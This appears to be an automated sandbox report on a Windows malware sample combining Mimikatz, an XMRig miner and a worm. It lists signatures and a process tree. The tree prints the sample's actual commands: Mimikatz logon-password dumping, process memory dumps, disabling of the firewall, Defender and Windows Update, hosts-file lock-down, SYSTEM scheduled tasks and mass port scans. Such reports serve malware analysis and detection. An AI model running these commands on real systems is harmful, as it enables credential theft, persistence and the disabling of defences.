Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-10-2024 06:54

General

  • Target

    2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe

  • Size

    9.4MB

  • MD5

    89419f01e8cd90c37aad24df81044ebf

  • SHA1

    e5ab2fea34af1a3100de7ed68555e00920d5f4ee

  • SHA256

    2abdb7720777601e696a03929a29c72c2a5b7a0caeb2334933013e01175261c8

  • SHA512

    4d9ad9830c7f7dc1502aa70ff831f8364299a9a68456d4a7022925f43200447986a141205dd2845a478c65cc2ad2799eb9fb506522c2dee0bef4ad0c53400711

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (28851) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2128
      • C:\Windows\TEMP\evfeutbbp\nfquyl.exe
        "C:\Windows\TEMP\evfeutbbp\nfquyl.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1684
    • C:\Users\Admin\AppData\Local\Temp\2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yqqdgivv\wlifiji.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2092
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2060
        • C:\Windows\yqqdgivv\wlifiji.exe
          C:\Windows\yqqdgivv\wlifiji.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3564
    • C:\Windows\yqqdgivv\wlifiji.exe
      C:\Windows\yqqdgivv\wlifiji.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3008
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:3320
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3336
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:2540
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2888
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
                PID:4524
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3096
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1800
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3612
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3864
              • C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe
                C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:3400
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3804
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4636
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4808
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                      PID:2724
                  • C:\Windows\SysWOW64\net.exe
                    net stop npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4400
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:5000
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2888
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3592
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2904
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4832
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:876
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1628
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4612
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1952
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2684
                • C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe
                  C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:5072
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ysudwuiub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ysudwuiub\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:2036
                • C:\Windows\ysudwuiub\Corporate\vfshost.exe
                  C:\Windows\ysudwuiub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4260
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hqqdukrbq" /ru system /tr "cmd /c C:\Windows\ime\wlifiji.exe"
                2⤵
                  PID:3440
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1184
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "hqqdukrbq" /ru system /tr "cmd /c C:\Windows\ime\wlifiji.exe"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1644
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gihftdilj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:532
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4680
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "gihftdilj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3292
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "telinbtbg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3640
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1680
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "telinbtbg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4808
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2796
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:4664
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3396
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2260
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3556
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2408
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:316
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4172
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:1436
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3096
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1936
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:1212
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3544
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1564
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                        PID:3480
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4444
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1184
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3300
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1448
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1880
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3932
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3684
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                      PID:4416
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3396
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1264
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1252
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:876
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1952
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3764
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2228
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3804
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:32
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                        PID:3596
                        • C:\Windows\SysWOW64\sc.exe
                          sc config WinDefend start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:1900
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config wuauserv start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4520
                        • C:\Windows\SysWOW64\sc.exe
                          sc config wuauserv start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:4172
                      • C:\Windows\TEMP\xohudmc.exe
                        C:\Windows\TEMP\xohudmc.exe
                        2⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:3556
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 756 C:\Windows\TEMP\ysudwuiub\756.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2964
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 1016 C:\Windows\TEMP\ysudwuiub\1016.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4200
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2128 C:\Windows\TEMP\ysudwuiub\2128.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2940
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2604 C:\Windows\TEMP\ysudwuiub\2604.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3064
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2948 C:\Windows\TEMP\ysudwuiub\2948.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5060
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2992 C:\Windows\TEMP\ysudwuiub\2992.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2564
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 672 C:\Windows\TEMP\ysudwuiub\672.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:740
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3752 C:\Windows\TEMP\ysudwuiub\3752.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2068
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3880 C:\Windows\TEMP\ysudwuiub\3880.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2452
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3956 C:\Windows\TEMP\ysudwuiub\3956.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4536
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 4048 C:\Windows\TEMP\ysudwuiub\4048.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3748
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 4316 C:\Windows\TEMP\ysudwuiub\4316.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5064
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2288 C:\Windows\TEMP\ysudwuiub\2288.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2940
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3040 C:\Windows\TEMP\ysudwuiub\3040.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5000
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 4160 C:\Windows\TEMP\ysudwuiub\4160.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1276
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3832 C:\Windows\TEMP\ysudwuiub\3832.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:920
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3664 C:\Windows\TEMP\ysudwuiub\3664.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:604
                      • C:\Windows\TEMP\ysudwuiub\bteqliisl.exe
                        C:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 5116 C:\Windows\TEMP\ysudwuiub\5116.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3404
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c C:\Windows\ysudwuiub\tluvwvuph\scan.bat
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3192
                        • C:\Windows\ysudwuiub\tluvwvuph\kbebvutsd.exe
                          kbebvutsd.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          PID:4092
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                        2⤵
                          PID:2448
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5068
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                            3⤵
                              PID:3508
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2756
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1580
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:184
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                              3⤵
                                PID:3844
                          • C:\Windows\SysWOW64\umueiy.exe
                            C:\Windows\SysWOW64\umueiy.exe
                            1⤵
                            • Executes dropped EXE
                            • Suspicious use of SetWindowsHookEx
                            PID:1752
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\wlifiji.exe
                            1⤵
                              PID:3660
                              • C:\Windows\ime\wlifiji.exe
                                C:\Windows\ime\wlifiji.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:3280
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F
                              1⤵
                                PID:2104
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:376
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F
                                    2⤵
                                      PID:3596
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F
                                    1⤵
                                      PID:1824
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:2284
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F
                                          2⤵
                                            PID:2756
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\wlifiji.exe
                                          1⤵
                                            PID:5908
